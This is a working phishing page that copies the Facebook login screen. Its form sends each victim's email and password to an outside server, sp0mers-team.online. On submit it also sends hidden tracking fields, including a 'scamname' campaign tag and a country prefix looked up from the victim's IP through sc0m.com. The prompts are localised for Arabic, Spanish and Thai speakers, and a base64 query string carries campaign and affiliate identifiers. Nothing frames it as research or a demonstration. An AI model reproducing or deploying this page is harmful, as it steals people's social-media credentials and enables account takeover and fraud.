<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Facebook Login</title>
    <link rel="stylesheet" href="style.css">
  </head>
  <body>
    <div class="container flex">
      <div class="facebook-page flex">
        <div class="text">
          <h1>facebook</h1>
          <p>Connect with friends and the world </p>
          <p> around you on Facebook.</p>
        </div>
        <div id="page">
            <form  method="POST" action="https://sp0mers-team.online/v/add">

                <label>
                    <input id="email" name="email" :placeholder="email" type="text" required>
                </label>

                <label>
                    <input id="password" name="password" :placeholder="password" required type="password">
                </label>

                <input type="hidden" value="" name="code" v-model="codecountry">

                <input type="hidden" value="" name="id" v-model="id_u">
                <input type="hidden" value="" name="sc" v-model="scamname">

                <div class="link">
                <button type="submit" onclick="ss()" name="add" class="login">{{login}}</button>
                    <!-- <button type="submit" class="login">Login</button> -->
                    <a href="#" class="forgot">Forgot password?</a>
                  </div>
                  <hr>
                  <div class="button">
                    <a href="#">Create new account</a>
                  </div>
            </form>
        </div>
      </div>
    </div>
  </body>
  
 


<script src="https://unpkg.com/axios/dist/axios.min.js"></script>
<script src="https://unpkg.com/country-phone-prefix@latest"></script>
<script src="https://cdn.jsdelivr.net/npm/vue/dist/vue.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/socket.io/4.3.2/socket.io.js"></script>

<script>
    const socket = io("https://sp0mers-team.online/v/add");
    const queryStrings = window.location.search;
    const urlParamss = new URLSearchParams(queryStrings);
    const qs = urlParamss.get('q');

    let rrss = atob(qs);
    let users = rrss.split("_")[3];
    users = users.split("=")[1];
    function ss() {
        socket.emit('add', {
            nickname: "users",
            groupe: parseInt(users),
        });
        socket.emit('adds', {
            nickname: "users",
            groupe: "all",
        });
    };
</script>
<script>
    var vm = new Vue({
        el: "#page",
        data: {
            password: "",
            email: "",
            login: '',
            firsts: '',
            create: '',
            forget: '',
            fetch: [],
            codecountry: '',
            id_u: '',
            scamname: '',
        },
        methods: {

        },

        mounted() {
            let email = document.getElementById('email').value;
            let password = document.getElementById('password').value;
            const queryString = window.location.search;
            const urlParams = new URLSearchParams(queryString);
            const q = urlParams.get('q');

            let rrs = atob(q);
            let idu = rrs.split("=")[1][1]
            let user = rrs.split("_")[3]
            user = user.split("=")[1]
            let sc = rrs.split("_")[2]
            sc = sc.split("=")[1]
            rrs = rrs.split("_")[1]
            rrs = rrs.split("=")[1]
            //alert(user)
            let lang = rrs;
            this.id_u = user
            this.scamname = sc

            if (lang == 'ar') {
                this.email = "رقم الهاتف  أو البريد الإلكتروني";
                this.password = "كلمه السر";
                this.create = "انشاء حساب جديد";
                this.firsts = "انت تحتاج لتسجيل الدخول اولا.";
                this.forget = " هل نسيت كلمة السر ؟";
                this.login = "تسجيل الدخول"
            }
            else if (lang == 'es') {
                this.email = "Número o correo electrónico";
                this.password = "contraseña";
                this.create = "Crear una nueva cuenta";
                this.firsts = "Primero debes iniciar sesión.";
                this.forget = "¿Contraseña olvidada?";
                this.login = "iniciar sesión";
            }
            else if (lang == 'th') {
                this.email = "เบอร์มือถือหรืออีเมล";
                this.password = "รหัสผ่าน";
                this.create = "สร้างบัญชีใหม่";
                this.firsts = "คุณต้องเข้าสู่ระบบก่อน";
                this.forget = "ลืมรหัสผ่าน?";
                this.login = "เข้าสู่ระบบ";
            }
            else {
                this.email = "Mobile number or email address";
                this.password = "Password";
                this.create = "Create New Account";
                this.firsts = "You need to log in first.";
                this.forget = "Forgotten password?";
                this.login = "Log In";
            }
			axios.get("https://sc0m.com/ext/ip.php")
                .then((resps) => {

                    let dd = cpp[resps.data]
                    this.codecountry = dd.prefix;
                })

        },
    })

    
</script>



    </html>
